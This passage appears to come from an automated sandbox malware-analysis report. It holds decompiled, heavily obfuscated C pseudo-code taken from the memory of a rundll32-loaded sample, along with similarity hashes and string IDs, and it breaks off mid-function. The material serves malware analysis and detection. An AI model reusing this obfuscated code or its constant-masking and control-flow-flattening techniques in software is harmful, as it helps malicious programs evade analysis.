                                                                                                                      				_v184 = _v184 + 0xffff863b;
                                                                                                                      				_v184 = _v184 + 0xffff7ebb;
                                                                                                                      				_v184 = _v184 + 0x5f54;
                                                                                                                      				_v184 = _v184 ^ 0x005a5f37;
                                                                                                                      				_v68 = 0x13fcd3;
                                                                                                                      				_v68 = _v68 + 0x7ca8;
                                                                                                                      				_v68 = _v68 >> 3;
                                                                                                                      				_v68 = _v68 ^ 0x000ac947;
                                                                                                                      				_v24 = 0xc2d10f;
                                                                                                                      				_v24 = _v24 + 0xffff657d;
                                                                                                                      				_v24 = _v24 ^ 0x00c52471;
                                                                                                                      				_v192 = 0x48c156;
                                                                                                                      				_v192 = _v192 >> 4;
                                                                                                                      				_t518 = 0x2f;
                                                                                                                      				_v192 = _v192 * 0x2f;
                                                                                                                      				_v192 = _v192 + 0xffffa98f;
                                                                                                                      				_v192 = _v192 ^ 0x00d9c1bc;
                                                                                                                      				_v112 = 0xb16c9;
                                                                                                                      				_v112 = _v112 >> 0xe;
                                                                                                                      				_v112 = _v112 << 0x10;
                                                                                                                      				_v112 = _v112 / _t518;
                                                                                                                      				_v112 = _v112 ^ 0x00028b59;
                                                                                                                      				_v120 = 0x2563ad;
                                                                                                                      				_t519 = 0x30;
                                                                                                                      				_v120 = _v120 / _t519;
                                                                                                                      				_v120 = _v120 + 0xffffe9b6;
                                                                                                                      				_v120 = _v120 >> 8;
                                                                                                                      				_v120 = _v120 ^ 0x000e86e4;
                                                                                                                      				_v60 = 0x629492;
                                                                                                                      				_t520 = 0x32;
                                                                                                                      				_v60 = _v60 / _t520;
                                                                                                                      				_v60 = _v60 << 0xa;
                                                                                                                      				_v60 = _v60 ^ 0x07e42de9;
                                                                                                                      				_v128 = 0x197221;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 << 1;
                                                                                                                      				_v128 = _v128 * 0x2e;
                                                                                                                      				_v128 = _v128 ^ 0x0004057d;
                                                                                                                      				_t521 = _v16;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					goto L2;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t533 = _t524 - 0x94e79b7;
                                                                                                                      							if(_t533 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t533 == 0) {
                                                                                                                      								_push(_t471);
                                                                                                                      								_push(_t471);
                                                                                                                      								_t445 = E00822912(0x20000);
                                                                                                                      								_t470 = _t445;
                                                                                                                      								if(_t470 != 0) {
                                                                                                                      									_t524 = 0x4150ae2;
                                                                                                                      									goto L12;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0x35d4444) {
                                                                                                                      									_t453 = E00812296(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
                                                                                                                      									_t471 = _v104;
                                                                                                                      									_t531 =  &(_t531[5]);
                                                                                                                      									_v20 = _t453;
                                                                                                                      									_t505 = 0x812254d;
                                                                                                                      									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 == 0x4150ae2) {
                                                                                                                      										_push(_t471);
                                                                                                                      										_push(_t471);
                                                                                                                      										_t529 = E00822912(0x2000);
                                                                                                                      										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									} else {
                                                                                                                      										if(_t524 == 0x4f6d4ac) {
                                                                                                                      											_t521 = _t521 + 0x2c;
                                                                                                                      											asm("sbb esi, esi");
                                                                                                                      											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t524 == 0x53e4020) {
                                                                                                                      												E008280D6(_v164, _t471, _t529, _v108, _v80);
                                                                                                                      												_t531 =  &(_t531[3]);
                                                                                                                      												L11:
                                                                                                                      												_t524 = 0xd965e23;
                                                                                                                      												L12:
                                                                                                                      												L13:
                                                                                                                      												_t471 = _v104;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												if(_t524 == _t505) {
                                                                                                                      													E008189C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
                                                                                                                      													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
                                                                                                                      													E0082DA89(_v48, _v172, _v140, _v20, _v72);
                                                                                                                      													_t531 =  &(_t531[0xa]);
                                                                                                                      													L28:
                                                                                                                      													_t471 = _v104;
                                                                                                                      													_t505 = 0x812254d;
                                                                                                                      												}
                                                                                                                      												goto L29;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							goto L30;
                                                                                                                      						}
                                                                                                                      						if(_t524 == 0x98aa4b1) {
                                                                                                                      							E00815CDE(_v112, _v120, _v60, _v128, _t470);
                                                                                                                      							_t531 =  &(_t531[3]);
                                                                                                                      							_t524 = 0x34e8be;
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							if(_t524 == 0xd2f1d9f) {
                                                                                                                      								_t473 = _v44;
                                                                                                                      								_t448 = E0082DDE9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
                                                                                                                      								_t531 =  &(_t531[0x11]);
                                                                                                                      								if(_t448 == 0) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_t467 = E00814EE2(_t473);
                                                                                                                      									_t524 = 0x35d4444;
                                                                                                                      									_v100 = _v16 * 0x2c + _t470;
                                                                                                                      									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
                                                                                                                      									goto L13;
                                                                                                                      								}
                                                                                                                      								L31:
                                                                                                                      							} else {
                                                                                                                      								if(_t524 == 0xd582a45) {
                                                                                                                      									_t524 = 0x94e79b7;
                                                                                                                      									goto L2;
                                                                                                                      								} else {
                                                                                                                      									if(_t524 != 0xd965e23) {
                                                                                                                      										goto L29;
                                                                                                                      									} else {
                                                                                                                      										E00815CDE(_v184, _v68, _v24, _v192, _t529);
                                                                                                                      										_t531 =  &(_t531[3]);
                                                                                                                      										_t524 = 0x98aa4b1;
                                                                                                                      										goto L12;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						break;
                                                                                                                      						L29:
                                                                                                                      						_t445 = _v100;
                                                                                                                      					} while (_t524 != 0x34e8be);
                                                                                                                      					L30:
                                                                                                                      					return _t445;
                                                                                                                      					goto L31;
                                                                                                                      				}
                                                                                                                      			}








































































                                                                                                                      0x0082e7e1
                                                                                                                      0x0082e7e9
                                                                                                                      0x0082e7f1
                                                                                                                      0x0082e7f9
                                                                                                                      0x0082e801
                                                                                                                      0x0082e80c
                                                                                                                      0x0082e817
                                                                                                                      0x0082e81f
                                                                                                                      0x0082e82a
                                                                                                                      0x0082e835
                                                                                                                      0x0082e840
                                                                                                                      0x0082e84b
                                                                                                                      0x0082e853
                                                                                                                      0x0082e85d
                                                                                                                      0x0082e860
                                                                                                                      0x0082e864
                                                                                                                      0x0082e86c
                                                                                                                      0x0082e874
                                                                                                                      0x0082e87c
                                                                                                                      0x0082e881
                                                                                                                      0x0082e88e
                                                                                                                      0x0082e892
                                                                                                                      0x0082e89a
                                                                                                                      0x0082e8a6
                                                                                                                      0x0082e8ab
                                                                                                                      0x0082e8b1
                                                                                                                      0x0082e8b9
                                                                                                                      0x0082e8be
                                                                                                                      0x0082e8c6
                                                                                                                      0x0082e8d8
                                                                                                                      0x0082e8db
                                                                                                                      0x0082e8e2
                                                                                                                      0x0082e8ea
                                                                                                                      0x0082e8f5
                                                                                                                      0x0082e8fd
                                                                                                                      0x0082e902
                                                                                                                      0x0082e90b
                                                                                                                      0x0082e90f
                                                                                                                      0x0082e917
                                                                                                                      0x0082e922
                                                                                                                      0x0082e922
                                                                                                                      0x0082e922
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e927
                                                                                                                      0x0082e92d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0082e933
                                                                                                                      0x0082eaab
                                                                                                                      0x0082eaac
                                                                                                                      0x0082eab2
                                                                                                                      0x0082eab7
                                                                                                                      0x0082eabd
                                                                                                                      0x0082eac3
                                                                                                                      0x00000000
                                                                                                                      0x0082eac3
                                                                                                                      0x0082e939
                                                                                                                      0x0082e93f
                                                                                                                      0x0082ea6e
                                                                                                                      0x0082ea73
                                                                                                                      0x0082ea77
                                                                                                                      0x0082ea7c
                                                                                                                      0x0082ea8c
                                                                                                                      0x0082ea91
                                                                                                                      0x00000000
                                                                                                                      0x0082e945
                                                                                                                      0x0082e94b
                                                                                                                      0x0082ea2a
                                                                                                                      0x0082ea2b
                                                                                                                      0x0082ea36
                                                                                                                      0x0082ea46
                                                                                                                      0x00000000
                                                                                                                      0x0082e951
                                                                                                                      0x0082e957
                                                                                                                      0x0082ea03
                                                                                                                      0x0082ea08
                                                                                                                      0x0082ea10
                                                                                                                      0x00000000
                                                                                                                      0x0082e95d
                                                                                                                      0x0082e964
                                                                                                                      0x0082e9e9
                                                                                                                      0x0082e9ee
                                                                                                                      0x0082e9f1
                                                                                                                      0x0082e9f1
                                                                                                                      0x0082e9f6
                                                                                                                      0x0082e9fa
                                                                                                                      0x0082e9fa
                                                                                                                      0x00000000
                                                                                                                      0x0082e966
                                                                                                                      0x0082e968
                                                                                                                      0x0082e999
                                                                                                                      0x0082e9c0
                                                                                                                      0x0082e9ca
                                                                                                                      0x0082e9cf
                                                                                                                      0x0082ebd8
                                                                                                                      0x0082ebd8
                                                                                                                      0x0082ebdc
                                                                                                                      0x0082ebdc
                                                                                                                      0x00000000
                                                                                                                      0x0082e968
                                                                                                                      0x0082e964
                                                                                                                      0x0082e957
                                                                                                                      0x0082e94b
                                                                                                                      0x0082e93f
                                                                                                                      0x00000000
                                                                                                                      0x0082e933
                                                                                                                      0x0082ead3
                                                                                                                      0x0082ebcb
                                                                                                                      0x0082ebd0
                                                                                                                      0x0082ebd3
                                                                                                                      0x00000000
                                                                                                                      0x0082ead9
                                                                                                                      0x0082eadf
                                                                                                                      0x0082eb72
                                                                                                                      0x0082eb79
                                                                                                                      0x0082eb7e
                                                                                                                      0x0082eb83
                                                                                                                      0x00000000
                                                                                                                      0x0082eb89
                                                                                                                      0x0082eb8d
                                                                                                                      0x0082eb95
                                                                                                                      0x0082ebab
                                                                                                                      0x0082ebaf
                                                                                                                      0x00000000
                                                                                                                      0x0082ebaf
                                                                                                                      0x00000000
                                                                                                                      0x0082eae1
                                                                                                                      0x0082eae7
                                                                                                                      0x0082eb1e
                                                                                                                      0x00000000
                                                                                                                      0x0082eae9
                                                                                                                      0x0082eaef
                                                                                                                      0x00000000
                                                                                                                      0x0082eaf5
                                                                                                                      0x0082eb0c
                                                                                                                      0x0082eb11
                                                                                                                      0x0082eb14
                                                                                                                      0x00000000
                                                                                                                      0x0082eb14
                                                                                                                      0x0082eaef
                                                                                                                      0x0082eae7
                                                                                                                      0x0082eadf
                                                                                                                      0x00000000
                                                                                                                      0x0082ebe1
                                                                                                                      0x0082ebe1
                                                                                                                      0x0082ebe5
                                                                                                                      0x0082ebfb
                                                                                                                      0x0082ebfb
                                                                                                                      0x00000000
                                                                                                                      0x0082ebfb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: cc9d7666e5a42b9b1d45412138da64cff6873f0e17663281ed660693d61439bf
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 57222F719083808FE7A8CF25D58AA4BFBE1FBC4314F108A1DE5DA96260D7B19949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00816F82(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				char _v2080;
                                                                                                                      				char _v2600;
                                                                                                                      				signed int _v2604;
                                                                                                                      				signed int _v2608;
                                                                                                                      				signed int _v2612;
                                                                                                                      				signed int _v2616;
                                                                                                                      				signed int _v2620;
                                                                                                                      				signed int _v2624;
                                                                                                                      				signed int _v2628;
                                                                                                                      				signed int _v2632;
                                                                                                                      				signed int _v2636;
                                                                                                                      				signed int _v2640;
                                                                                                                      				signed int _v2644;
                                                                                                                      				signed int _v2648;
                                                                                                                      				signed int _v2652;
                                                                                                                      				signed int _v2656;
                                                                                                                      				signed int _v2660;
                                                                                                                      				signed int _v2664;
                                                                                                                      				signed int _v2668;
                                                                                                                      				signed int _v2672;
                                                                                                                      				signed int _v2676;
                                                                                                                      				signed int _v2680;
                                                                                                                      				signed int _v2684;
                                                                                                                      				signed int _v2688;
                                                                                                                      				signed int _v2692;
                                                                                                                      				signed int _v2696;
                                                                                                                      				signed int _v2700;
                                                                                                                      				signed int _v2704;
                                                                                                                      				signed int _v2708;
                                                                                                                      				signed int _v2712;
                                                                                                                      				signed int _v2716;
                                                                                                                      				signed int _v2720;
                                                                                                                      				signed int _v2724;
                                                                                                                      				signed int _v2728;
                                                                                                                      				signed int _v2732;
                                                                                                                      				signed int _v2736;
                                                                                                                      				signed int _v2740;
                                                                                                                      				signed int _v2744;
                                                                                                                      				signed int _v2748;
                                                                                                                      				signed int _v2752;
                                                                                                                      				signed int _v2756;
                                                                                                                      				signed int _v2760;
                                                                                                                      				signed int _v2764;
                                                                                                                      				signed int _v2768;
                                                                                                                      				signed int _v2772;
                                                                                                                      				signed int _v2776;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				signed int _t423;
                                                                                                                      				signed int _t424;
                                                                                                                      				signed int _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t430;
                                                                                                                      				void* _t463;
                                                                                                                      				void* _t464;
                                                                                                                      				signed int* _t468;
                                                                                                                      
                                                                                                                      				_t468 =  &_v2776;
                                                                                                                      				_v2716 = 0x9827f0;
                                                                                                                      				_v2716 = _v2716 << 9;
                                                                                                                      				_v2716 = _v2716 >> 4;
                                                                                                                      				_v2716 = _v2716 ^ 0x0304fe29;
                                                                                                                      				_v2684 = 0x251356;
                                                                                                                      				_v2684 = _v2684 + 0x1e2;
                                                                                                                      				_v2684 = _v2684 | 0xda75bfb2;
                                                                                                                      				_v2684 = _v2684 ^ 0xda7428eb;
                                                                                                                      				_v2768 = 0x24e368;
                                                                                                                      				_v2768 = _v2768 ^ 0xd5a17b15;
                                                                                                                      				_v2768 = _v2768 << 7;
                                                                                                                      				_v2768 = _v2768 | 0xced33043;
                                                                                                                      				_v2768 = _v2768 ^ 0xced6ff80;
                                                                                                                      				_v2736 = 0xa2f196;
                                                                                                                      				_v2736 = _v2736 + 0x6d02;
                                                                                                                      				_v2736 = _v2736 << 8;
                                                                                                                      				_v2736 = _v2736 * 0x63;
                                                                                                                      				_t463 = __ecx;
                                                                                                                      				_v2736 = _v2736 ^ 0x2d971c6c;
                                                                                                                      				_t464 = 0x422d362;
                                                                                                                      				_v2760 = 0x391c44;
                                                                                                                      				_v2760 = _v2760 >> 0x10;
                                                                                                                      				_v2760 = _v2760 + 0xe88b;
                                                                                                                      				_v2760 = _v2760 + 0x506d;
                                                                                                                      				_v2760 = _v2760 ^ 0x00052d5d;
                                                                                                                      				_v2744 = 0x960a81;
                                                                                                                      				_t421 = 3;
                                                                                                                      				_v2744 = _v2744 * 0x47;
                                                                                                                      				_v2744 = _v2744 * 0x66;
                                                                                                                      				_v2744 = _v2744 + 0x35e4;
                                                                                                                      				_v2744 = _v2744 ^ 0x94845397;
                                                                                                                      				_v2604 = 0xe8b0f5;
                                                                                                                      				_v2604 = _v2604 + 0x9847;
                                                                                                                      				_v2604 = _v2604 ^ 0x00e1425b;
                                                                                                                      				_v2712 = 0x9aefe1;
                                                                                                                      				_v2712 = _v2712 + 0x2d7a;
                                                                                                                      				_v2712 = _v2712 | 0x79d44310;
                                                                                                                      				_v2712 = _v2712 ^ 0x79db8805;
                                                                                                                      				_v2728 = 0x1377c5;
                                                                                                                      				_v2728 = _v2728 | 0x6e97ff53;
                                                                                                                      				_v2728 = _v2728 + 0x22de;
                                                                                                                      				_v2728 = _v2728 ^ 0x6e9b6172;
                                                                                                                      				_v2752 = 0xb1335e;
                                                                                                                      				_v2752 = _v2752 ^ 0x2dbaf336;
                                                                                                                      				_v2752 = _v2752 / _t421;
                                                                                                                      				_v2752 = _v2752 ^ 0xfe92c193;
                                                                                                                      				_v2752 = _v2752 ^ 0xf19577cc;
                                                                                                                      				_v2660 = 0x2952e4;
                                                                                                                      				_v2660 = _v2660 | 0x79708fb3;
                                                                                                                      				_v2660 = _v2660 ^ 0x797ec65d;
                                                                                                                      				_v2680 = 0x48d1a6;
                                                                                                                      				_t422 = 0x34;
                                                                                                                      				_v2680 = _v2680 / _t422;
                                                                                                                      				_v2680 = _v2680 * 0x69;
                                                                                                                      				_v2680 = _v2680 ^ 0x0099bc36;
                                                                                                                      				_v2612 = 0xcdd72a;
                                                                                                                      				_v2612 = _v2612 * 0x50;
                                                                                                                      				_v2612 = _v2612 ^ 0x4054338c;
                                                                                                                      				_v2672 = 0x8e3222;
                                                                                                                      				_v2672 = _v2672 << 1;
                                                                                                                      				_v2672 = _v2672 ^ 0x0115b014;
                                                                                                                      				_v2772 = 0xea36ba;
                                                                                                                      				_v2772 = _v2772 + 0xffff2869;
                                                                                                                      				_v2772 = _v2772 >> 2;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd7b9291;
                                                                                                                      				_v2772 = _v2772 ^ 0xcd4b3afc;
                                                                                                                      				_v2776 = 0x8f99fe;
                                                                                                                      				_v2776 = _v2776 + 0x5190;
                                                                                                                      				_v2776 = _v2776 + 0xffffc7d6;
                                                                                                                      				_v2776 = _v2776 ^ 0x0f761f96;
                                                                                                                      				_v2776 = _v2776 ^ 0x0ff50908;
                                                                                                                      				_v2652 = 0xb833cd;
                                                                                                                      				_t423 = 0x31;
                                                                                                                      				_v2652 = _v2652 * 0x75;
                                                                                                                      				_v2652 = _v2652 ^ 0x5422af3f;
                                                                                                                      				_v2620 = 0x8c6cc6;
                                                                                                                      				_v2620 = _v2620 + 0xffff9da6;
                                                                                                                      				_v2620 = _v2620 ^ 0x008df9f5;
                                                                                                                      				_v2688 = 0x40b504;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3e337a5;
                                                                                                                      				_v2688 = _v2688 + 0x808c;
                                                                                                                      				_v2688 = _v2688 ^ 0xc3a77743;
                                                                                                                      				_v2704 = 0x4030d0;
                                                                                                                      				_v2704 = _v2704 | 0xd8d5f091;
                                                                                                                      				_v2704 = _v2704 ^ 0xb4a4ac2b;
                                                                                                                      				_v2704 = _v2704 ^ 0x6c7bdbfc;
                                                                                                                      				_v2644 = 0xafd4ef;
                                                                                                                      				_v2644 = _v2644 * 0x3b;
                                                                                                                      				_v2644 = _v2644 ^ 0x288fb790;
                                                                                                                      				_v2764 = 0x1d91e2;
                                                                                                                      				_v2764 = _v2764 | 0xd96eda72;
                                                                                                                      				_v2764 = _v2764 + 0xffffbbe3;
                                                                                                                      				_v2764 = _v2764 >> 0xc;
                                                                                                                      				_v2764 = _v2764 ^ 0x000d90f8;
                                                                                                                      				_v2696 = 0x4b7a41;
                                                                                                                      				_v2696 = _v2696 | 0xbfeeeeed;
                                                                                                                      				_v2696 = _v2696 ^ 0xbfe32e95;
                                                                                                                      				_v2708 = 0x8f6339;
                                                                                                                      				_v2708 = _v2708 | 0xa71a0417;
                                                                                                                      				_v2708 = _v2708 + 0xffff51d8;
                                                                                                                      				_v2708 = _v2708 ^ 0xa79b9aa8;
                                                                                                                      				_v2636 = 0x12e7d6;
                                                                                                                      				_v2636 = _v2636 * 0x21;
                                                                                                                      				_v2636 = _v2636 ^ 0x026e6de9;
                                                                                                                      				_v2756 = 0xd5c5d;
                                                                                                                      				_v2756 = _v2756 ^ 0x716456fc;
                                                                                                                      				_v2756 = _v2756 + 0xa334;
                                                                                                                      				_v2756 = _v2756 >> 0xc;
                                                                                                                      				_v2756 = _v2756 ^ 0x000918e1;
                                                                                                                      				_v2608 = 0xbb78a7;
                                                                                                                      				_v2608 = _v2608 + 0xd6b3;
                                                                                                                      				_v2608 = _v2608 ^ 0x00b2dabe;
                                                                                                                      				_v2668 = 0xad3636;
                                                                                                                      				_v2668 = _v2668 + 0xffffa01e;
                                                                                                                      				_v2668 = _v2668 ^ 0x00a02f3e;
                                                                                                                      				_v2628 = 0x4494fc;
                                                                                                                      				_v2628 = _v2628 / _t423;
                                                                                                                      				_v2628 = _v2628 ^ 0x0009fca5;
                                                                                                                      				_v2748 = 0x660e04;
                                                                                                                      				_v2748 = _v2748 + 0xffffa723;
                                                                                                                      				_v2748 = _v2748 | 0x67469fe4;
                                                                                                                      				_t424 = 0x4b;
                                                                                                                      				_v2748 = _v2748 * 5;
                                                                                                                      				_v2748 = _v2748 ^ 0x050bc0b3;
                                                                                                                      				_v2616 = 0xd4c89d;
                                                                                                                      				_v2616 = _v2616 << 7;
                                                                                                                      				_v2616 = _v2616 ^ 0x6a6fac0f;
                                                                                                                      				_v2700 = 0xaa08c8;
                                                                                                                      				_v2700 = _v2700 + 0xffffd108;
                                                                                                                      				_v2700 = _v2700 / _t424;
                                                                                                                      				_v2700 = _v2700 ^ 0x0001fda8;
                                                                                                                      				_v2732 = 0x67cb1c;
                                                                                                                      				_v2732 = _v2732 << 5;
                                                                                                                      				_v2732 = _v2732 | 0x2b3c2ffa;
                                                                                                                      				_v2732 = _v2732 ^ 0x295e7aa1;
                                                                                                                      				_v2732 = _v2732 ^ 0x06a01d44;
                                                                                                                      				_v2656 = 0xfaf065;
                                                                                                                      				_v2656 = _v2656 + 0xffff35fd;
                                                                                                                      				_v2656 = _v2656 ^ 0x00f58676;
                                                                                                                      				_v2740 = 0x2bd94;
                                                                                                                      				_v2740 = _v2740 + 0x3f47;
                                                                                                                      				_t425 = 0x2a;
                                                                                                                      				_v2740 = _v2740 / _t425;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3749d7;
                                                                                                                      				_v2740 = _v2740 ^ 0xca3fc9be;
                                                                                                                      				_v2664 = 0x3942c4;
                                                                                                                      				_v2664 = _v2664 << 0xe;
                                                                                                                      				_v2664 = _v2664 ^ 0x50bf8d15;
                                                                                                                      				_v2724 = 0xb2ae33;
                                                                                                                      				_t426 = 0x22;
                                                                                                                      				_v2724 = _v2724 / _t426;
                                                                                                                      				_v2724 = _v2724 << 1;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c628229;
                                                                                                                      				_v2724 = _v2724 ^ 0x6c6ae222;
                                                                                                                      				_v2640 = 0xd32362;
                                                                                                                      				_v2640 = _v2640 + 0xffff88f4;
                                                                                                                      				_v2640 = _v2640 ^ 0x00d4f71b;
                                                                                                                      				_v2648 = 0x3e5b4d;
                                                                                                                      				_v2648 = _v2648 + 0x4f8c;
                                                                                                                      				_v2648 = _v2648 ^ 0x003b681e;
                                                                                                                      				_v2676 = 0xc6bb8b;
                                                                                                                      				_v2676 = _v2676 << 4;
                                                                                                                      				_t427 = 0x14;
                                                                                                                      				_v2676 = _v2676 / _t427;
                                                                                                                      				_v2676 = _v2676 ^ 0x009ad4f5;
                                                                                                                      				_v2720 = 0xa3b34d;
                                                                                                                      				_v2720 = _v2720 + 0xffff97dd;
                                                                                                                      				_v2720 = _v2720 | 0x7136ebef;
                                                                                                                      				_v2720 = _v2720 ^ 0x71b8bb4e;
                                                                                                                      				_v2692 = 0xa7ff58;
                                                                                                                      				_t404 = _v2692 * 0x31;
                                                                                                                      				_v2692 = _t404;
                                                                                                                      				_v2692 = _v2692 >> 4;
                                                                                                                      				_v2692 = _v2692 ^ 0x020bdfc2;
                                                                                                                      				_v2624 = 0xa501ce;
                                                                                                                      				_v2624 = _v2624 | 0xdc20330f;
                                                                                                                      				_v2624 = _v2624 ^ 0xdca3e6f8;
                                                                                                                      				_v2632 = 0xa992b7;
                                                                                                                      				_v2632 = _v2632 | 0x4e4d69fe;
                                                                                                                      				_v2632 = _v2632 ^ 0x4ee71179;
                                                                                                                      				while(_t464 != 0x2953b22) {
                                                                                                                      					if(_t464 == 0x422d362) {
                                                                                                                      						_t464 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t475 = _t464 - 0xe704baa;
                                                                                                                      						if(_t464 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t464 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E008306A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
                                                                                                                      							 *((short*)(E008243A8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
                                                                                                                      							E00817A50(_v2712,  &_v1560, _t475, _v2728);
                                                                                                                      							_push(_v2612);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x1000181c);
                                                                                                                      							E0081DBCE(E00819F66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
                                                                                                                      							E0081A203(_v2688, _v2704, _v2644, _t415);
                                                                                                                      							_t427 = _v2764;
                                                                                                                      							_t404 = E0082B78F(_t427,  &_v2080, _t463, _v2696);
                                                                                                                      							_t468 =  &(_t468[0x15]);
                                                                                                                      							if(_t404 != 0) {
                                                                                                                      								_t464 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t404;
                                                                                                                      				}
                                                                                                                      				_push(_t427);
                                                                                                                      				E0081DE7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
                                                                                                                      				_push(_v2616);
                                                                                                                      				_push(_v2748);
                                                                                                                      				_push(0x100018cc);
                                                                                                                      				E0081DBCE(E00819F66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
                                                                                                                      				_t430 = _v2724;
                                                                                                                      				E0081A203(_t430, _v2640, _v2648, _t406);
                                                                                                                      				_push(_v2632);
                                                                                                                      				_push(_v2624);
                                                                                                                      				_push(_v2692);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v2720);
                                                                                                                      				_push(_t430);
                                                                                                                      				_push(0);
                                                                                                                      				_t427 =  &_v520;
                                                                                                                      				_t404 = E00818B00(_t427, _v2676, __eflags);
                                                                                                                      				_t468 =  &(_t468[0x1c]);
                                                                                                                      				_t464 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}

































































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: 7010b2d2785b72a82f397ea71a3134ee213cfbbb0747ae9a5c21a1b002e3c2f6
                                                                                                                      • Instruction ID: 67c070c727ce2f90babb74e710bcee29b0bdd1b3538cbc8f141f200ad010465f
                                                                                                                      • Opcode Fuzzy Hash: 7010b2d2785b72a82f397ea71a3134ee213cfbbb0747ae9a5c21a1b002e3c2f6
                                                                                                                      • Instruction Fuzzy Hash: 1612FFB150C3819FD3A8CF21C58AA8BBBE1BBC5358F108A1DE1D996260D7B18949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E008268DD() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
